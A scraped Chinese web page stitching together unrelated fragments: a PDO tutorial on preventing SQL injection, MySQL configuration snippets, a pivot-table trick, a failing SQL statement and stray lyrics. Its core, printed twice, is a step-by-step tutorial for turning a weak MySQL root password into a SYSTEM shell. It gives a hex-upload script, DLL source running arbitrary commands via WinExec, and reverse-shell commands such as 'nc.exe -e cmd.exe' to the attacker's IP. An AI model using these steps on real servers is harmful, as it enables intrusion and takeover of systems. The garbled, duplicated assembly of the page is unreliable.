主要是用于有记录结果返回的操作，特别是SELECT操作PDO::exec() 主要是针对没有结果集合返回的操作，如INSERT、UPDATE等操作PDO::prepare() 主要是预处理操作，需要通过$rs->execute()来执行预处理里面的SQL语句，这个方法可以绑定参数，功能比较强大（防止sql注入就靠这个）PDO::lastInsertId() 返回上次插入操作，主键列类型是自增的最后的自增ID PDOStatement::fetch() 是用来获取一条记录PDOStatement::fetchAll() 是获取所有记录集到一个集合PDOStatement::fetchColumn() 是获取结果指定第一条记录的某个字段，缺省是第一个字段PDOStatement::rowCount() :主要是用于PDO::query()和PDO::prepare()进行DELETE、INSERT、UPDATE操作影响的结果集，对PDO::exec()方法和SELECT操作无效。5.PDO操作MYSQL数据库实例<?php $pdo = new PDO("mysql:host=localhost;dbname=mydb","root",""); if($pdo -> exec("insert into mytable(name,content) values("fdipzone","123456")")){ echo "insert success"; echo $pdo -> lastinsertid(); } ?><?php $pdo = new PDO("mysql:host=localhost;dbname=mydb","root",""); $rs = $pdo -> query("select * from table"); $rs->setFetchMode(PDO::FETCH_ASSOC); //关联数组形式//$rs->setFetchMode(PDO::FETCH_NUM); //数字索引数组形式while($row = $rs -> fetch()){ print_r($row); } ?><?phpforeach( $db->query( "SELECT * FROM table" ) as $row ){ print_r( $row );}?>统计有多少行数据：<?php$sql="select count(*) from table";$num = $dbh->query($sql)->fetchColumn();?>prepare方式：<?php$query = $dbh->prepare("select * from table");if ($query->execute()) { while ($row = $query->fetch()) { print_r($row); }}?>prepare参数化查询：<?php$query = $dbh->prepare("select * from table where id = ?");if ($query->execute(array(1000))) { while ($row = $query->fetch(PDO::FETCH_ASSOC)) { print_r($row); }}?>使用PDO访问MySQL数据库时，真正的real prepared statements 默认情况下是不使用的。为了解决这个问题，你必须禁用 prepared statements的仿真效果。下面是使用PDO创建链接的例子：<?php$dbh = new PDO("mysql:dbname=mydb;host=127.0.0.1;charset=utf8", "root", "pass");$dbh->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);?>setAttribute()这一行是强制性的，它会告诉 PDO 禁用模拟预处理语句，并使用 real parepared statements 。这可以确保SQL语句和相应的值在传递到mysql服务器之前是不会被PHP解析的（禁止了所有可能的恶意SQL注入攻击）。虽然你可以配置文件中设置字符集的属性(charset=utf8)，但是需要格外注意的是，老版本的 PHP（ < 5.3.6）在DSN中是忽略字符参数的。完整的代码使用实例：<?php$dbh = new PDO("mysql:host=localhost; dbname=mydb", "root", "pass");$dbh->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); //禁用prepared statements的仿真效果$dbh->exec("set names "utf8""); $sql="select * from table where username = ? and password = ?";$query = $dbh->prepare($sql); $exeres = $query->execute(array($username, $pass)); if ($exeres) { while ($row = $query->fetch(PDO::FETCH_ASSOC)) { print_r($row); }}$dbh = null;?>上面这段代码就可以防范sql注入。为什么呢？当调用 prepare() 时，查询语句已经发送给了数据库服务器，此时只有占位符 ? 发送过去，没有用户提交的数据；当调用到 execute()时，用户提交过来的值才会传送给数据库，它们是分开传送的，两者独立的，SQL攻击者没有一点机会。但是我们需要注意的是以下几种情况，PDO并不能帮助你防范SQL注入。不能让占位符 ? 代替一组值，这样只会获取到这组数据的第一个值，如：select * from table where userid in ( ? );如果要用in_查找，可以改用find_in_set()实现$ids = "1,2,3,4,5,6";select * from table where find_in_set(userid, ?);不能让占位符代替数据表名或列名，如：select * from table order by ?;不能让占位符 ? 代替任何其他SQL语法，如：select extract( ? from addtime) as mytime from table;本篇文章如何使用PDO查询mysql避免SQL注入的方法，更多相关内容请关注Gxl网。

把localhost改为有mysql的服务器地址，当然还需要端口、用户名、密码，也就是说是你可以访问的数据库服务器。

开启这个功能的具体方法就是设置php.ini文件，步骤如下： 1、查看public_html目录下没有php.ini文件，如果有的， 打开文件查找 extension=php_pdo_mysql.dll extension=php_pdo.dll 把前面的分号去掉,然后保存文件。 2、如果没有，就新建一个文件php.in 把下面两行添加进去 extension=pdo.so extension=pdo_mysql.so 注意：php.ini文件需要放到相应的目录下，比如另外绑定的域名则需要将php.ini文件放到相应的子目录下。 总体原则就是哪个目录需要就把php.ini文件放到那个目录下。

很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！ 首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF DLL中自写的Function函数，而执行任意命令。 思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！ 下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码（网友Mix用的方法）： set @a = concat("",0x0123abc1312389…..); set @a = concat(@a,0x4658978abc545e……); …………………. create table Mix(data LONGBLOB);//建表Mix,字段为data，类型为longblob insert into Mix values("");update Mix set data = @a;//@a插入表Mix select data from Mix into DUMPFILE "C:\Winnt\文件名";//导出表中内容为文件 前两句很熟悉把，这个就是我们以前注入的时候，绕过"的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。 后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下： fp=wscript.arguments(0 fn=right(fp,len(fp)-instrrev(fp,"")) with createobject("adodb.stream") .type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str) end with sll=sl mod 65536:slh=sl65536 with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true) .write "set @a = concat("",0x" for i=1 to sl bt=ascb(midb(str,i,1)) if bt<16 then .write "0" .write hex(bt) if i mod 128=0 then .write ");" vbcrlf "set @a = concat(@a,0x" next end with 好了，现在只要你把所要上传的文件拖到这个脚本图标上面，就可以生成一个同名的txt文件了。这个txt文件，就是我们所需要的mysql脚本，当然我们还需要修改一下这个txt文件（毕竟他是我们偷工减料得来的！），把最后一行生成的多余的那句“set @a = concat("",0x”删除了，加上建表，插值得那三句代码即可！ 脚本生成了，如何上传？先登陆mysql服务器： C:>mysql –u root –h hostip –p Mysql>use mysql; //先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库 Mysql>. E:*.dll.txt; //这儿就是你生成的mysql脚本 按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！ 下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！ 先用mix.dll: 登陆mysql,输入命令： Mysql> . e:mix.dll.txt; Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME "C:\windows\mix.dll"; //这儿的注册的Mixconnect就是在我们dll文件中实现的函数，我们将要用他执行系统命令！ Mysql> select Mixconnect("你的ip","8080"); //填写你的反弹ip和端口 过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了！如图1： 这个的确不错，通过反弹得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select Mixconnect("你的ip","8080");”的时候，对方的mysql会当掉！报错，然后服务停止！ 所以，使用mix.dll你只有一次成功，没有再来一次的机会！另外根据我的测试，他对Win2003的系统好像不起作用。 再用my_udf.dll： Mysql>. C:my_udf.dll.txt Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME "C:\winnt\my_udf.dll"; //同样地，my_udfdoor也是我们注册后，用来执行系统命令得函数 Mysql> select my_udfdoor(""); //这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数 好了，现在你可以不用关这个shell了，我们再开一个cmd，使用： D:>nc hostip 3306 * 4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k” ,他是my_udfdoor默认密码，自己无法更改 过一会儿，你就有了系统权限的shell了， 由于他是hook recv版，所以穿墙的能力很强，我是在上一个mix.dll反弹失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select my_udfdoor("");”后），不管你是否连接，只要执行了: Mysql>drop function my_udfdoor; 后，mysql也汇报错，然后挂掉， 所以，你使用这个dll文件无法删除你的痕迹！ 最后，然我们自己写一个自定义的dll文件。看能不能解决问题。 我们仅仅使用mysql 得udf的示例作模版即可！看他的示例： #include <stdlib.h> #include <winsock.h> #include <mysql.h> extern "C" { char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error); // 兼容C } char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) { char * me = "my name"; return me; // 调用此UDF将返回 my name } 十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了： 下面是我的一个哥们Crackme是修改的： #include <stdlib.h> #include <windows.h> #include "mysql.h" extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名，你可以任意修改 __declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改！ { char me[256] = {0}; if (args->arg_count == 1){ strncpy(me,args->args[0],args->lengths[0]); me[args->lengths[0]]=""; WinExec(me,SW_HIDE); //就是用它来执行任意命令 }else strcpy(me,"do nonthing. "); return me; } 好，我们编译成sysudf.dll文件就可以了！我们来用他实验一把！ 看操作： Mysql>. C:sysudf.dll.txt Mysql>Create function sys_name returns string soname "C:\windows\sysudf.dll"; Mysql>. Nc.exe.txt //把nc.exe也上传上去 Mysql>select sys_name("nc.exe -e cmd.exe 我的ip 8080"); //sys_name参数只有一个，参数指定要执行的系统命令 好，看看在Win2003中的一个反弹shell了， 当然，我们你也可以不反弹shell了，而去执行其他命令，只不过不论是否执行成功，都没有回显，所以要保证命令格式正确。对于这个dll文件，经过测试，不论何时“drop function sys_name;”，都是不会报错的，同时也可以多次运行不同命令。至于他的缺点，就是他的穿墙能力跟Mix.dll一样不算太强，但对于实在穿不透的墙，直接运行其他命令就是最好的选择了。 上面三个dll文件可谓各有所短，如何选择，就看你遇到的实际情况了。 好了，从脚本得编写使用到dll文件编写使用，说了这么多，现在大家应该都会了吧？题目说的是弱口令得到系统权限，但是如果你在注入等其他过程中，爆出了config.php中的mysql密码，不也是可以使用的吗？这样我们岂不是也找到继Serv-u后又一大提权方法了吗？

如果我害怕噪音的话，我很可能会亲自去看一看。

很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！ 首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF DLL中自写的Function函数，而执行任意命令。 思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！ 下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码（网友Mix用的方法）： set @a = concat("",0x0123abc1312389…..); set @a = concat(@a,0x4658978abc545e……); …………………. create table Mix(data LONGBLOB);//建表Mix,字段为data，类型为longblob insert into Mix values("");update Mix set data = @a;//@a插入表Mix select data from Mix into DUMPFILE "C:\Winnt\文件名";//导出表中内容为文件 前两句很熟悉把，这个就是我们以前注入的时候，绕过"的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。 后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下： fp=wscript.arguments(0 fn=right(fp,len(fp)-instrrev(fp,"")) with createobject("adodb.stream") .type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str) end with sll=sl mod 65536:slh=sl65536 with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true) .write "set @a = concat("",0x" for i=1 to sl bt=ascb(midb(str,i,1)) if bt<16 then .write "0" .write hex(bt) if i mod 128=0 then .write ");" vbcrlf "set @a = concat(@a,0x" next end with 好了，现在只要你把所要上传的文件拖到这个脚本图标上面，就可以生成一个同名的txt文件了。这个txt文件，就是我们所需要的mysql脚本，当然我们还需要修改一下这个txt文件（毕竟他是我们偷工减料得来的！），把最后一行生成的多余的那句“set @a = concat("",0x”删除了，加上建表，插值得那三句代码即可！ 脚本生成了，如何上传？先登陆mysql服务器： C:>mysql –u root –h hostip –p Mysql>use mysql; //先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库 Mysql>. E:*.dll.txt; //这儿就是你生成的mysql脚本 按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！ 下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！ 先用mix.dll: 登陆mysql,输入命令： Mysql> . e:mix.dll.txt; Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME "C:\windows\mix.dll"; //这儿的注册的Mixconnect就是在我们dll文件中实现的函数，我们将要用他执行系统命令！ Mysql> select Mixconnect("你的ip","8080"); //填写你的反弹ip和端口 过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了！如图1： 这个的确不错，通过反弹得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select Mixconnect("你的ip","8080");”的时候，对方的mysql会当掉！报错，然后服务停止！ 所以，使用mix.dll你只有一次成功，没有再来一次的机会！另外根据我的测试，他对Win2003的系统好像不起作用。 再用my_udf.dll： Mysql>. C:my_udf.dll.txt Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME "C:\winnt\my_udf.dll"; //同样地，my_udfdoor也是我们注册后，用来执行系统命令得函数 Mysql> select my_udfdoor(""); //这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数 好了，现在你可以不用关这个shell了，我们再开一个cmd，使用： D:>nc hostip 3306 * 4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k” ,他是my_udfdoor默认密码，自己无法更改 过一会儿，你就有了系统权限的shell了， 由于他是hook recv版，所以穿墙的能力很强，我是在上一个mix.dll反弹失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select my_udfdoor("");”后），不管你是否连接，只要执行了: Mysql>drop function my_udfdoor; 后，mysql也汇报错，然后挂掉， 所以，你使用这个dll文件无法删除你的痕迹！ 最后，然我们自己写一个自定义的dll文件。看能不能解决问题。 我们仅仅使用mysql 得udf的示例作模版即可！看他的示例： #include <stdlib.h> #include <winsock.h> #include <mysql.h> extern "C" { char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error); // 兼容C } char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) { char * me = "my name"; return me; // 调用此UDF将返回 my name } 十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了： 下面是我的一个哥们Crackme是修改的： #include <stdlib.h> #include <windows.h> #include "mysql.h" extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名，你可以任意修改 __declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改！ { char me[256] = {0}; if (args->arg_count == 1){ strncpy(me,args->args[0],args->lengths[0]); me[args->lengths[0]]=""; WinExec(me,SW_HIDE); //就是用它来执行任意命令 }else strcpy(me,"do nonthing. "); return me; } 好，我们编译成sysudf.dll文件就可以了！我们来用他实验一把！ 看操作： Mysql>. C:sysudf.dll.txt Mysql>Create function sys_name returns string soname "C:\windows\sysudf.dll"; Mysql>. Nc.exe.txt //把nc.exe也上传上去 Mysql>select sys_name("nc.exe -e cmd.exe 我的ip 8080"); //sys_name参数只有一个，参数指定要执行的系统命令 好，看看在Win2003中的一个反弹shell了， 当然，我们你也可以不反弹shell了，而去执行其他命令，只不过不论是否执行成功，都没有回显，所以要保证命令格式正确。对于这个dll文件，经过测试，不论何时“drop function sys_name;”，都是不会报错的，同时也可以多次运行不同命令。至于他的缺点，就是他的穿墙能力跟Mix.dll一样不算太强，但对于实在穿不透的墙，直接运行其他命令就是最好的选择了。 上面三个dll文件可谓各有所短，如何选择，就看你遇到的实际情况了。 好了，从脚本得编写使用到dll文件编写使用，说了这么多，现在大家应该都会了吧？题目说的是弱口令得到系统权限，但是如果你在注入等其他过程中，爆出了config.php中的mysql密码，不也是可以使用的吗？这样我们岂不是也找到继Serv-u后又一大提权方法了吗？

支持，代码如下："pivot table" or a "crosstab report"(Note: this page needs to be wikified)SQL Characteristic Functions: Do it without "if", "case", or "GROUP_CONCAT".Yes, there is use for this..."if" statements sometimes cause problemswhen used in combination.The simple secret, and it"s also why they work in almost all databases, is thefollowing functions:o sign (x) returns -1,0, +1 for values x < 0, x = 0, x > 0 respectivelyo abs( sign( x) ) returns 0 if x = 0 else, 1 if x > 0 or x < 0o 1-abs( sign( x) ) complement of the above, since this returns 1 only if x = 0Quick example: sign(-1) = -1, abs( sign(-1) ) = 1, 1-abs( sign(-1) ) = 0Data for full example:CREATE TABLE exams (pkey int(11) NOT NULL auto_increment,name varchar(15),exam int,score int,PRIMARY KEY (pkey));insert into exams (name,exam,score) values ("Bob",1,75);insert into exams (name,exam,score) values ("Bob",2,77);insert into exams (name,exam,score) values ("Bob",3,78);insert into exams (name,exam,score) values ("Bob",4,80);insert into exams (name,exam,score) values ("Sue",1,90);insert into exams (name,exam,score) values ("Sue",2,97);insert into exams (name,exam,score) values ("Sue",3,98);insert into exams (name,exam,score) values ("Sue",4,99);mysql> select * from exams;

"pivot table" or a "crosstab report"(Note: this page needs to be wikified)SQL Characteristic Functions: Do it without "if", "case", or "GROUP_CONCAT".Yes, there is use for this..."if" statements sometimes cause problemswhen used in combination.The simple secret, and it"s also why they work in almost all databases, is thefollowing functions:o sign (x) returns -1,0, +1 for values x < 0, x = 0, x > 0 respectivelyo abs( sign( x) ) returns 0 if x = 0 else, 1 if x > 0 or x < 0o 1-abs( sign( x) ) complement of the above, since this returns 1 only if x = 0Quick example: sign(-1) = -1, abs( sign(-1) ) = 1, 1-abs( sign(-1) ) = 0Data for full example:CREATE TABLE exams (pkey int(11) NOT NULL auto_increment,name varchar(15),exam int,score int,PRIMARY KEY (pkey));insert into exams (name,exam,score) values ("Bob",1,75);insert into exams (name,exam,score) values ("Bob",2,77);insert into exams (name,exam,score) values ("Bob",3,78);insert into exams (name,exam,score) values ("Bob",4,80);insert into exams (name,exam,score) values ("Sue",1,90);insert into exams (name,exam,score) values ("Sue",2,97);insert into exams (name,exam,score) values ("Sue",3,98);insert into exams (name,exam,score) values ("Sue",4,99);mysql> select * from exams;+------+------+------+-------+| pkey | name | exam | score |+------+------+------+-------+| 1 | Bob | 1 | 75 || 2 | Bob | 2 | 77 || 3 | Bob | 3 | 78 || 4 | Bob | 4 | 80 || 5 | Sue | 1 | 90 || 6 | Sue | 2 | 97 || 7 | Sue | 3 | 98 || 8 | Sue | 4 | 99 |+------+------+------+-------+8 rows in set (0.00 sec)mysql> select name,sum(score*(1-abs(sign(exam-1)))) as exam1,sum(score*(1-abs(sign(exam-2)))) as exam2,sum(score*(1-abs(sign(exam-3)))) as exam3,sum(score*(1-abs(sign(exam-4)))) as exam4from exams group by name;+------+-------+-------+-------+-------+| name | exam1 | exam2 | exam3 | exam4 |+------+-------+-------+-------+-------+| Bob | 75 | 77 | 78 | 80 || Sue | 90 | 97 | 98 | 99 |+------+-------+-------+-------+-------+2 rows in set (0.00 sec)Note, the above pivot table was created with one select statement.Let"s decompose to make the trick clearer, for the second exam:mysql> select name, score, exam, exam-2, sign(exam-2), abs(sign(exam-2)), 1-abs(sign(exam-2)),score*(1-abs(sign(exam-2))) as exam2 from exams;+------+-------+------+--------+--------------+-------------------+---------------------+-------+| name | score | exam | exam-2 | sign(exam-2) | abs(sign(exam-2)) | 1-abs(sign(exam-2)) | exam2 |+------+-------+------+--------+--------------+-------------------+---------------------+-------+| Bob | 75 | 1 | -1 | -1 | 1 | 0 | 0 || Bob | 77 | 2 | 0 | 0 | 0 | 1 | 77 || Bob | 78 | 3 | 1 | 1 | 1 | 0 | 0 || Bob | 80 | 4 | 2 | 1 | 1 | 0 | 0 || Sue | 90 | 1 | -1 | -1 | 1 | 0 | 0 || Sue | 97 | 2 | 0 | 0 | 0 | 1 | 97 || Sue | 98 | 3 | 1 | 1 | 1 | 0 | 0 || Sue | 99 | 4 | 2 | 1 | 1 | 0 | 0 |+------+-------+------+--------+--------------+-------------------+---------------------+-------+8 rows in set (0.00 sec)You may think IF"s would be clean but WATCH OUT!Look what the following gives (INCORRECT !!):

mysql数据库 CREATE TABLE IF NOT EXISTS PJM_PROJECT_GROUP( "PJM_PROJECT_GROUP_ID" VARCHAR(32) , "CATEGORY_ID" VARCHAR(32) , "RZ_ORG_ID" VARCHAR(32) , "DB_ORG_ID" VARCHAR(32) , "ORG_AGENT_ID" VARCHAR(32), "TITLE" VARCHAR(128) , "CODE" VARCHAR(15) , "MONEY" DECIMAL(16,2) , "CONTRACT_URL" VARCHAR(128) , "INVEST_LOWEST" DECIMAL(16,2) , "INVEST_ADD" DECIMAL(16,2) , "MIN_INCOME" DECIMAL(16,2) , "MAX_INCOME" DECIMAL(16,2) , "TYPE" CHAR(4) , "REPAY_TYPE" CHAR(4) , "SITE_FEE" DECIMAL(16,2) , "STATUS" CHAR(10) , "CREATE_STAFF_ID" VARCHAR(32) , "CREATE_TIME" DATETIME , "UPDATE_STAFF_ID" VARCHAR(32) , "UPDATE_TIME" DATETIME , "CHECK_STAFF_ID" VARCHAR(32) , "CHECK_STAFF_ID" DATETIME ,)CREATE PROCEDURE dataShift()BEGIN INSERT INTO PJM_PROJECT_GROUP("PJM_PROJECT_GROUP_ID","CATEGORY_ID","RZ_ORG_ID","DB_ORG_ID","ORG_AGENT_ID","TITLE","CODE","MIN_INCOME","MAX_INCOME","TYPE","REPAY_TYPE","SITE_FEE") SELECT PROJECT_ID,CATEGORY_ID,RZ_ORG_ID,DB_ORG_ID,ORG_AGENT_ID,TITLE,CODE,YEAR_INCOME,YEAR_INCOME,LOAN_TYPE,REPAY_TYPE,SITE_FEE FROM PJM_PROJECTENDCALL dataShift()错误信息：[Err] 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ""PJM_PROJECT_GROUP_ID" VARCHAR(32) , "CATEGORY_ID" VARCHAR(32) , "RZ_ORG_ID"" at line 3

一般来说，keygen.exe文件很可能是病毒或恶意软件，因为它们通常用于非法破解软件，或者在安装软件时强制安装其他恶意软件。建议不要下载和运行这样的文件。相反，建议从官方网站下载并安装MySQL可视化工具，以确保软件的安全性和完整性。

# 开启master semi sync replicationloose_rpl_semi_sync_master_enabled = 1# 开启slave semi syncreplicationloose_rpl_semi_sync_slave_enabled = 1# 等待5秒无ack应答自动切换为异步模式loose_rpl_semi_sync_master_timeout = 5000

我的灵魂,你的节奏. 随着那风逐渐消失,你的音乐节拍

一般是3级钢琴曲我的谱是6级的这些不是考级的曲子只能靠复调、技巧、和旋、复杂度、目测来确定